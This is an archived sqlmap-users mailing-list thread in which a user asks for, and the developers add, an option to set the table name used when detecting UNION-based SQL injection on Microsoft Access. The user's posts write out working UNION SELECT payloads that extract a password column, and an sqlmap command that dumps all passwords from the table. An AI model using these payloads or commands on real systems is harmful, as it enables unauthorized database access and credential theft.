Thread: [sqlmap-users] MS Access: provide option to specify table name to detect union based sqli vuln
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users
|
From: buawig <bu...@gm...> - 2013-03-19 19:37:24
|
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Hi, I've got a simple union based sqli (resulting webpage shows only one entry/row). Valid statements that show the numbers in the resulting html page: ...&id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar ...&id=123 union select top 1 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar - - foobar is an existing table (gathered via error messages in html) - - password is a valid column in the foobar table The following URL gives you one password: ...&id=123 union select top 1 1,2,3,4,5,6,password,8,9,10,11,12,13 from foobar Now I wanted to hand over to sqlmap to dump all passwords: sqlmap -u <url> -p id --dbms="Microsoft Access" -T foobar -C password - --dump which did not work out (0 entries retrieved), but it was confirmed that the table has several hundred entries. - - sqlmap was able to detect the number of columns is 13 (correct) - - sqlmap confirmed a bolean-based blind sqli vulnerability (but no UNION based sqli) - - sqlmap was able to confirm the existence of table name (with --tables) (echo foobar > txt/common-tables.txt) - - sqlmap was able to confirm the existence of column name password (with --colums) When running something like: - --technique=U --union-cols=13 --union-char=1 sqlmap requested something *like*: ...id=-123 union all select 1,2,3,4,5,6,CHR(58)&CHR(111)&CHR(58),8,9,10,11,12,13 from MSysAccessObjects%00 which results in the following error message (shown in the html page): The Microsoft Jet database engine cannot find the input table or query 'MSysAccessObjects'. Make sure it exists and that its name is spelled correctly. So if sqlmap would accept a known tablename on the command line that it would use to detect/confirm the union based sqli vuln, instead of using "MSysAccessObjects" this would make sqlmap more useful (or simply use the table name specified in -T or previously bruteforced to detect union-based sqli). thanks! PS: I did *not* run sqlmap with special --risk/--level because I don't want to send several unneeded http requests if the vulnerability is already confirmed (manually). I'm using sqlmap mainly for exploitation (not so much for detection) and would appreciate if the user could tell sqlmap how to exploit a certain sqli (something that is already partially given with --technique, --union-cols, --union-chars). I did use 1.0-dev-d1ae62b. ref: http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html http://unconciousmind.blogspot.com/2011/05/sqlmap-vs-webappsecurity-testing-web.html -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJRSL3LAAoJEJeRHQyF0ukMFLsP/3OdDtcE5K+6AttmQhmadyum 0/yDLbtTS06W6iW1iguuvPL/Kva6gURynOrwEh/eD+AOPVVBUD6vjjHx9Z8R4XLO 8OrOWqQ6xe7ppjsU3ThXy550vFD/n62DgNjsM/JkwTFicSki4+JYwbmE9CPjfSfk mRmLadOP4/iU7m+s3bv6f58jTUO6YdPOqR3yEWuES5k+sL+7QDDPPk8fEqbvKuxw JK2yYsa5ZmP78GW9s7Gg1BjnMI51G3NbNI0ZdZllFm2APwSw9R+13YzXwtp0V6oJ L+SDZJ0ZIJLEw133F/eoASVTQMZICz/K494KmXWlv68ac9TLmrvRGcis7o6FdGE1 lUa5LC7ddNE7Z21g83miC4CaG4JUqXxQ2kdW1HW7joLGHl+Gi45gr0A+t6QmRVOl njOM/2O3wBDfaif68Equ9+Bm1JK5DzVEwu0mMBUrKNEfynR1PvU6/T7R/f1Ogu8p 8H32HtwGQLowwNYbHz3SMk0ecY9lVOAhIAA6afz0YTuyh777cVJCq7YmgTXBUlpQ zqEO72FGTyObOnbYhGE8dN6TdfsCk0Fdl5VJC3TTHoLRtRuQC7WzxZktwETl6Jxy dOjG2MpjMdtu3zR07WzuroRdrgFhnonb1Wq7BWDDKgB6kFrH80GMYt0hpNJ9mY0c 0p/jGfV1aHnEBhy3KpXe =Q1R5 -----END PGP SIGNATURE----- |
|
From: buawig <bu...@gm...> - 2013-03-20 16:31:32
|
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 to simply get the job done I changed the table name in: lib/core/dicts.py:144 after changing MSysAccessObjects to foobar sqlmap detected the union based sqli but exploitation did not work because it created very long queries and the server replied with: "query to complex" at the end I had to use extract data using boolean based exploitation (which did work after finding a column name in the table that had unique values) -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJRSeO+AAoJEJeRHQyF0ukMsrkQALcJwXhjXRRyXzusdloIc9ZZ Ybradjx4dKQ00lZR5nkQv+49Xe3V53bwcP4di2KqiiIIo/5gGyoxYzNAREsF2TT3 FpctmbmE13hnKg16HjZDbpxcJzUN1CMCs3Gb5E0ibP9/RTTHOegOG3xcvceEAj1Y DI8YFnDSmQRa2JBenJM8InHve3ue7Ef9seowHm4mBs8bniEskw2sAtxosVZJwUS9 eRndYwB9jBke9pXx+MuectmajWmMf0cTXhu5q5nOIbbykGZf2DDjduujLMCm6bT4 +iavnZkW/fHc+cnw1nmiwPcI2vCHxSLZW2ZX5FzpXjM4agXM8+FTQzT8+7WUalfW QAAkZYjNWiOgpvFVUBsqgb1ozc/4O33y1oNfbg7SHbopgPOApvtvAxjBa5Igtwh9 SDTuGXbuovQYoJEOI3JwxTMPXZuUpgvQgszvqfr/JB2MweZk/B9TPPIRLvLwLM3u yRRtrrxij296XJ/MZBq5dWcj1Ij3mS1hTeO2GkxNcJnh/vcN4Vsic8OJmQrEGRKP Xmz1VT4eqZMh3dzg6d90RQb3oCdVJ0OdY3Duvf7pPMCfKPtk9SROxoqmc+K0bQSl CIKgTBcsC3SAmVYZljYk2JqMnorcVvv7bXbvcM2okllA4fmZq+oGf+r2oO80zorQ NKORqeE2OQ6bqNYJaDIR =VMtR -----END PGP SIGNATURE----- |
|
From: Bernardo D. A. G. <ber...@gm...> - 2013-03-20 16:36:09
|
Hi buawig, We have a ticket to address DBMS-specific detection "limitations", https://github.com/sqlmapproject/sqlmap/issues/1 - Microsoft Access is indeed one of these cases. We could consider to use the user's provided database and/or table name when these are needed at detection phase rather than statically using hard-coded names. There're trade-offs to this thought. With regards to the query being overly long, you can use switch --no-cast to reduce the injected query length. Bernardo On 20 March 2013 16:28, buawig <bu...@gm...> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > to simply get the job done I changed the table name in: > lib/core/dicts.py:144 > > after changing MSysAccessObjects to foobar sqlmap detected the union > based sqli but exploitation did not work because it created very long > queries and the server replied with: "query to complex" > > at the end I had to use extract data using boolean based exploitation > (which did work after finding a column name in the table that had > unique values) > -----BEGIN PGP SIGNATURE----- > > iQIcBAEBCgAGBQJRSeO+AAoJEJeRHQyF0ukMsrkQALcJwXhjXRRyXzusdloIc9ZZ > Ybradjx4dKQ00lZR5nkQv+49Xe3V53bwcP4di2KqiiIIo/5gGyoxYzNAREsF2TT3 > FpctmbmE13hnKg16HjZDbpxcJzUN1CMCs3Gb5E0ibP9/RTTHOegOG3xcvceEAj1Y > DI8YFnDSmQRa2JBenJM8InHve3ue7Ef9seowHm4mBs8bniEskw2sAtxosVZJwUS9 > eRndYwB9jBke9pXx+MuectmajWmMf0cTXhu5q5nOIbbykGZf2DDjduujLMCm6bT4 > +iavnZkW/fHc+cnw1nmiwPcI2vCHxSLZW2ZX5FzpXjM4agXM8+FTQzT8+7WUalfW > QAAkZYjNWiOgpvFVUBsqgb1ozc/4O33y1oNfbg7SHbopgPOApvtvAxjBa5Igtwh9 > SDTuGXbuovQYoJEOI3JwxTMPXZuUpgvQgszvqfr/JB2MweZk/B9TPPIRLvLwLM3u > yRRtrrxij296XJ/MZBq5dWcj1Ij3mS1hTeO2GkxNcJnh/vcN4Vsic8OJmQrEGRKP > Xmz1VT4eqZMh3dzg6d90RQb3oCdVJ0OdY3Duvf7pPMCfKPtk9SROxoqmc+K0bQSl > CIKgTBcsC3SAmVYZljYk2JqMnorcVvv7bXbvcM2okllA4fmZq+oGf+r2oO80zorQ > NKORqeE2OQ6bqNYJaDIR > =VMtR > -----END PGP SIGNATURE----- > > ------------------------------------------------------------------------------ > Everyone hates slow websites. So do we. > Make your web apps faster with AppDynamics > Download AppDynamics Lite for free today: > http://p.sf.net/sfu/appdyn_d2d_mar > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) |
|
From: Miroslav S. <mir...@gm...> - 2013-03-21 10:32:38
|
Hi Buawig. Implemented as requested [1]. Now, in your case, you can (e.g.) use --union-from=foobar which will enforce usage of table name foobar in UNION query injection payloads. Kind regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap/issues/423 On Tue, Mar 19, 2013 at 8:34 PM, buawig <bu...@gm...> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > Hi, > > I've got a simple union based sqli (resulting webpage shows only one > entry/row). > > Valid statements that show the numbers in the resulting html page: > > ...&id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar > ...&id=123 union select top 1 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar > > - - foobar is an existing table (gathered via error messages in html) > - - password is a valid column in the foobar table > > The following URL gives you one password: > > ...&id=123 union select top 1 1,2,3,4,5,6,password,8,9,10,11,12,13 > from foobar > > > Now I wanted to hand over to sqlmap to dump all passwords: > > sqlmap -u <url> -p id --dbms="Microsoft Access" -T foobar -C password > - --dump > > which did not work out (0 entries retrieved), but it was confirmed > that the table has several hundred entries. > > - - sqlmap was able to detect the number of columns is 13 (correct) > - - sqlmap confirmed a bolean-based blind sqli vulnerability (but no > UNION based sqli) > - - sqlmap was able to confirm the existence of table name (with --tables) > (echo foobar > txt/common-tables.txt) > - - sqlmap was able to confirm the existence of column name password > (with --colums) > > When running something like: > - --technique=U --union-cols=13 --union-char=1 > > sqlmap requested something *like*: > > ...id=-123 union all select > 1,2,3,4,5,6,CHR(58)&CHR(111)&CHR(58),8,9,10,11,12,13 from > MSysAccessObjects%00 > > which results in the following error message (shown in the html page): > > The Microsoft Jet database engine cannot find the input table or query > 'MSysAccessObjects'. Make sure it exists and that its name is spelled > correctly. > > So if sqlmap would accept a known tablename on the command line that > it would use to detect/confirm the union based sqli vuln, instead of > using "MSysAccessObjects" this would make sqlmap more useful > (or simply use the table name specified in -T or previously > bruteforced to detect union-based sqli). > > thanks! > > PS: I did *not* run sqlmap with special --risk/--level because I don't > want to send several unneeded http requests if the vulnerability is > already confirmed (manually). I'm using sqlmap mainly for exploitation > (not so much for detection) and would appreciate if the user could > tell sqlmap how to exploit a certain sqli (something that is already > partially given with --technique, --union-cols, --union-chars). > > I did use 1.0-dev-d1ae62b. > > ref: > http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html > > http://unconciousmind.blogspot.com/2011/05/sqlmap-vs-webappsecurity-testing-web.html > -----BEGIN PGP SIGNATURE----- > > iQIcBAEBCgAGBQJRSL3LAAoJEJeRHQyF0ukMFLsP/3OdDtcE5K+6AttmQhmadyum > 0/yDLbtTS06W6iW1iguuvPL/Kva6gURynOrwEh/eD+AOPVVBUD6vjjHx9Z8R4XLO > 8OrOWqQ6xe7ppjsU3ThXy550vFD/n62DgNjsM/JkwTFicSki4+JYwbmE9CPjfSfk > mRmLadOP4/iU7m+s3bv6f58jTUO6YdPOqR3yEWuES5k+sL+7QDDPPk8fEqbvKuxw > JK2yYsa5ZmP78GW9s7Gg1BjnMI51G3NbNI0ZdZllFm2APwSw9R+13YzXwtp0V6oJ > L+SDZJ0ZIJLEw133F/eoASVTQMZICz/K494KmXWlv68ac9TLmrvRGcis7o6FdGE1 > lUa5LC7ddNE7Z21g83miC4CaG4JUqXxQ2kdW1HW7joLGHl+Gi45gr0A+t6QmRVOl > njOM/2O3wBDfaif68Equ9+Bm1JK5DzVEwu0mMBUrKNEfynR1PvU6/T7R/f1Ogu8p > 8H32HtwGQLowwNYbHz3SMk0ecY9lVOAhIAA6afz0YTuyh777cVJCq7YmgTXBUlpQ > zqEO72FGTyObOnbYhGE8dN6TdfsCk0Fdl5VJC3TTHoLRtRuQC7WzxZktwETl6Jxy > dOjG2MpjMdtu3zR07WzuroRdrgFhnonb1Wq7BWDDKgB6kFrH80GMYt0hpNJ9mY0c > 0p/jGfV1aHnEBhy3KpXe > =Q1R5 > -----END PGP SIGNATURE----- > > > ------------------------------------------------------------------------------ > Everyone hates slow websites. So do we. > Make your web apps faster with AppDynamics > Download AppDynamics Lite for free today: > http://p.sf.net/sfu/appdyn_d2d_mar > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
×
Want the latest updates on software, tech news, and AI?
Get latest updates about software, tech news, and AI from SourceForge directly in your inbox once a month.
Thanks for helping keep SourceForge clean.
X